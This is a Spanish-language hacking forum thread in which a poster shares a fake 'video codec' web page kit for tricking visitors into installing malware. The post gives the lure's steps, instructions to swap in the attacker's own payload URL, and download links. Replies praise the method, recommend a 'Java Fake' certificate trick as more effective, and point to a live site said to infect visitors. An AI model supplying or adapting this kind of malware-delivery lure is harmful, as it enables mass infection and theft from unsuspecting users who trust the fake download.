Bueno, pues os dejo esta herramienta porque me parece muy muy interesante y util, es de troyanosyvirus.com.ar.
Esto basicamente es un simple html que contiene un video, y para ver dicho video requiere descargarse un codec, se usa para infectar con cualquier malware.
Funciona de la siguiente manera:
1-El usuario ingresa en la web fake para ver un video..
2-Para ver el video se requiere la descarga de un archivo entonces el usuario puede o no proceder a descargar el "codec", si no lo descarga no pasara nada, ni podra ver el video.
3-Si el usuario instala ese "codec" quedara infectado y podra ver el video sin problemas para que no haya sospechas.
Es un metodo utilizado por los "spammers" para infectar de forma masiva, y no es nada novedoso pero nunca esta de mas postearlo.
(http://4.bp.blogspot.com/_QKWgCjfqXOU/SXp2OWlSXNI/AAAAAAAABQU/kzg_cftAfNw/s400/Fake+codecs.png)
(http://3.bp.blogspot.com/_QKWgCjfqXOU/SXp6NoccqdI/AAAAAAAABQk/ABSv1qSBW44/s400/Fake+codecs+2.png)
El archivo fake.html se puede subir a cualquier host, se le puede cambiar el nombre o modificarlo completo a gusto de cada uno. Las imagenes se encuentran en la carpeta commons, y ya estan alojadas en imageshack.us asi que no es nesesario subirlas.
Se debe modificar las URL siguiente con el bloc de notas u otro editor:
http://servidor.com/archivo.exe (http://%20%20%20http//servidor.com/archivo.exe)
Y opcionales:
http://server/mov1.html (http://server/mov1.html)
http://server/mov1.wmv (http://%20%20%20http//server/mov1.wmv)
¿Recomendación?
No descarguen códecs de webs que no sean conocidas y menos si su extension es .exe jaja...
Descarga:
Codecs fake web en html (http://rapidshare.com/files/188503793/Code_fake.rar)
Codecs fake web en html (http://www.badongo.com/file/13034349)
Este método es demasiado viejo, aún lo recuerdo, pero no esta demás descargarlo, se agradece.
Man este metodo lo use hace como 4 años y aun funciona es solo de saber meter un poco de ingeniera social.
Exácto, pero en estos casos preferiría más el Java Fake, al menos a mi punto de vista es mas eficaz.
Sí, yo también lo prefiero... Pero no esta de mas postearlo para saber que hay más alternativas.
Saludos
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Exácto, pero en estos casos preferiría más el Java Fake, al menos a mi punto de vista es mas eficaz.
Donde esta el java fake que hablas?
Si buscas en Google "Infectar por Java Fake" o "Certificado Fake Java" obtendrás más de una búsqueda :D
Aquí en el foro hay uno:
http://www.underc0de.org/foro/index.php?topic=3745.0
No tienes permitido ver enlaces.
Registrate o Entra a tu cuenta
Aquí en el foro hay uno:
http://www.underc0de.org/foro/index.php?topic=3745.0
Bueno segun dicen los que lo probaron que ese ya no funciona, alguien que conozca alguno funcional?
Claro que funciona, de hecho en http://daderos.com si entras te vota un Java Fake y te infectas, puedes entrar y darle cancelar para que mires que aún funciona, solo es cuestión de acomodar bien las cosas.